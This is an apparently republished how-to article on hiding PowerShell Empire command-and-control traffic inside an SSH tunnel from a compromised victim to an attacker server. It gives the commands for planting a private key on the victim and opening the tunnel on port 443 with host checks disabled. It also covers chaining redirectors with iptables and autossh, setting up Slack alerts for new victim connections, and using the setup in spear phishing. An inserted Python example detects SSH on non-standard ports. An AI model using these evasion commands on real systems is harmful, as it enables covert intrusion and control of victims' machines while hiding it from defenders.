
How to hide C2 traffic in a standard SSH tunnel

2025-02-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

Many inexperienced people are at a loss about how to hide C2 traffic in a standard SSH tunnel, so this article summarizes the problem and its solution. I hope it helps you solve it.

SSHazam is a technique for hiding C2 traffic inside a standard SSH tunnel to avoid network detection. In this article's example, PowerShell Empire connects to a port on the victim's localhost. That local port is forwarded over the SSH connection to the remote Empire server, so the only traffic visible on the network is SSH. The victim system in the example is OS X, but the same technique works on Windows using Plink.exe (part of the PuTTY toolset).

As the figure above shows, the victim system has an SSH tunnel that listens on port 5430 and forwards everything it receives to empire-server. On empire-server, Empire listens on the same port on its own localhost (127.0.0.1:5430). To make the SSH traffic less conspicuous, the SSH server listens on port 443 instead of the standard port 22; change the listening port in the SSH server configuration file and adjust the cloud provider's firewall rules to allow traffic on that port.

Before the tunnel can be established, you must create a private key or copy one to the victim's system, and the matching public key must be added to the authorized_keys file on empire-server to allow the SSH connection. In this example, the private key is written to the file ~/.ssh/.do.key on the victim, which can be done with the following commands:

mkdir ~/.ssh
chmod 700 ~/.ssh
echo "-----BEGIN RSA PRIVATE KEY-----" >> ~/.ssh/.do.key
echo MIIJKAIBAAKCAgEArVuMJdwgl9z9s1C0mrYV05hwUevmY+CkJaY/1iiPJSE6/AAp >> ~/.ssh/.do.key
echo +qkMZ9nrHkBQtaQMrXPW5MQXLxU/o8LQ5QyPiy/B4FiGEfNSx//mSJvEYAXXN4zC >> ~/.ssh/.do.key
echo RkiQ5Eir83CLCZFLRWV8wFvNkGV2krxMXDtHHFL5ars/J7tdBekmYI62eXnE5oXl >> ~/.ssh/.do.key
echo NHky2x6YsnQf5lOkC1XyWvwg77gR2kRhb9KpOi+hp6xB42o00mpbZgyY5V4= >> ~/.ssh/.do.key
echo "-----END RSA PRIVATE KEY-----" >> ~/.ssh/.do.key
chmod 600 ~/.ssh/.do.key

To prevent anyone who obtains the private key from doing anything beyond the tunnel on your empire-server, change the tunnel account's configuration on the Empire server: edit /etc/passwd and set that user's login shell to /bin/false.

victim:x:1001:1001:Victim Guy,:/home/victim:/bin/false

With the private key on the compromised system, a single command sets up the SSH tunnel and port forward:

ssh -i ~/.ssh/.do.key -p 443 -N -f -oStrictHostKeyChecking=no victim@empire-server.corp.com -L 5430:127.0.0.1:5430

Now you can configure PowerShell Empire, or your own C2, to listen for connections on 127.0.0.1:5430. This works even with more complex setups such as domain fronting.

Just like that, all C2 traffic is hidden inside an encrypted SSH tunnel, so you don't have to worry about the C2 traffic itself triggering other network signatures.
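The tunnel hides the C2 protocol, but not SSH itself: both ends send a cleartext "SSH-2.0-..." identification string before key exchange, so a sensor that classifies by payload rather than by port still sees SSH on 443 and a long-lived forwarding session. The following Python detector is added here as an example and is not part of the original article; it runs that check over constructed flow records (the IPs, banners and durations are made up).

```python
"""Flag SSH sessions that run on a port other than 22 (as with the
SSH-on-443 setup above) or stay open unusually long.  All flows below
are constructed sample data, not captured traffic."""
from dataclasses import dataclass

SSH_BANNER = b"SSH-"        # version string every SSH peer sends in cleartext
EXPECTED_SSH_PORTS = {22}   # ports where SSH is normal in this (assumed) network
LONG_SESSION_S = 3600       # tunnels for C2 tend to stay up far longer than admin logins


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    first_bytes: bytes   # first payload bytes sent by the responder (server side)
    duration_s: float


def looks_like_ssh(first_bytes: bytes) -> bool:
    """Protocol identification by banner, independent of the destination port."""
    return first_bytes.startswith(SSH_BANNER)


def classify(flow: Flow, long_session_s: float = LONG_SESSION_S) -> list:
    """Return the list of reasons a flow is suspicious (empty if it is not)."""
    reasons = []
    if not looks_like_ssh(flow.first_bytes):
        return reasons
    if flow.dport not in EXPECTED_SSH_PORTS:
        reasons.append(f"ssh-on-port-{flow.dport}")      # protocol/port mismatch
    if flow.duration_s >= long_session_s:
        reasons.append("long-lived-ssh")                 # persistent tunnel
    return reasons


# Constructed sample flows: one SSH-over-443 tunnel, one genuine TLS
# connection on 443, and one ordinary admin SSH login on port 22.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.10", 443, b"SSH-2.0-OpenSSH_8.9p1\r\n", 7200.0),
    Flow("10.0.0.5", "203.0.113.20", 443, b"\x16\x03\x01\x02\x00\x01\x00", 3.2),
    Flow("10.0.0.7", "10.0.0.1", 22, b"SSH-2.0-OpenSSH_9.3\r\n", 120.0),
]


def find_suspicious(flows=SAMPLE_FLOWS) -> dict:
    """Map 'src->dst:port' to its reasons for every flagged flow."""
    return {f"{f.src}->{f.dst}:{f.dport}": classify(f) for f in flows if classify(f)}


if __name__ == "__main__":
    for key, reasons in find_suspicious().items():
        print(key, ", ".join(reasons))
```

Network monitors such as Zeek apply the same idea through protocol detection and label such a connection's service as ssh whatever port it uses, so a query for service == ssh and port != 22 catches it without custom code.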

This technique looks good and simple, but you probably don't want your customer's sensitive data sitting on someone else's cloud. If so, you need additional redirectors that forward the traffic through the cloud to a system in your own network. The downside is that the setup becomes considerably more complicated, but don't worry, the problems are already worked out for you, as follows:

The C2 connection is forwarded to empire-redirector through the SSH tunnel. A firewall rule on empire-redirector forwards the traffic to another intermediate redirector. Finally, the internal system where the Empire C2 session ultimately lands establishes a reverse SSH connection to that final redirector.

The SSH command run on the victim's computer is:

ssh -i ~/.ssh/.do.key -p 443 -N -f -oStrictHostKeyChecking=no victim@empire-redirector.corp.com -L 5430:127.0.0.1:5430

The SSH command to run from an internal trusted system is:

autossh -M 5431 -o ServerAliveInterval=30 -R 5433 root@redirector.corp.com 10.10.185 root@redirector.corp.com

You may need to install autossh first, but it is worth it because it keeps the tunnel up over long periods by re-establishing it if it drops.

The iptables rules for empire-redirector are:

iptables -t nat -A OUTPUT -m addrtype --src-type LOCAL --dst-type LOCAL -p tcp -m multiport --dports 5430:65535 -j DNAT --to-destination 128.62.137.184:5432
iptables -t nat -A POSTROUTING -m addrtype --src-type LOCAL --dst-type UNICAST -j MASQUERADE
sysctl -w net.ipv4.conf.all.route_localnet=1

This forwards ports 5430 through 65535 to the final redirector, so any port in that range can be used to connect to the victim.

The iptables rules for the redirector are:

sysctl -w net.ipv4.conf.all.route_localnet=1
iptables -t nat -I PREROUTING -p tcp --dport 5432 -j DNAT --to 127.0.0.1

You may also want a Slack notification whenever an SSH connection is established. Add these two lines to /etc/pam.d/sshd on empire-redirector so that the Slack notification script runs automatically each time an SSH session is opened successfully.

session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
session optional pam_exec.so /home/root/ssh-slack-alert.sh

Here is the Slack script:

#!/usr/bin/env bash
# Run by pam_exec for every session event; skip the admin user and session-close events
if [ "$PAM_USER" != "admin" ] && [ "$PAM_TYPE" != "close_session" ]
then
  message="\`PamType: $PAM_TYPE\nSSH-User: $PAM_USER\nRhost: $PAM_RHOST\nServer: SSHazam\nHostname: $(hostname)\`"
  curl -X POST \
    --data-urlencode "payload={\"channel\": \"alerts\", \"username\": \"SSHazam\", \"text\": \"${message}\", \"icon_emoji\": \":boom:\"}" \
    https://hooks.slack.com/services/YOUR/SLACK/HOOKHERE
fi

Be careful: in this more complex scenario only one victim can connect at a time, unless each victim is configured with a different port and user/private key combination on empire-redirector. It's annoying, but it works well in spear phishing scenarios.

After reading the above, have you learned how to hide C2 traffic in a standard SSH tunnel? If you want to learn more, follow the industry information channel. Thank you for reading!
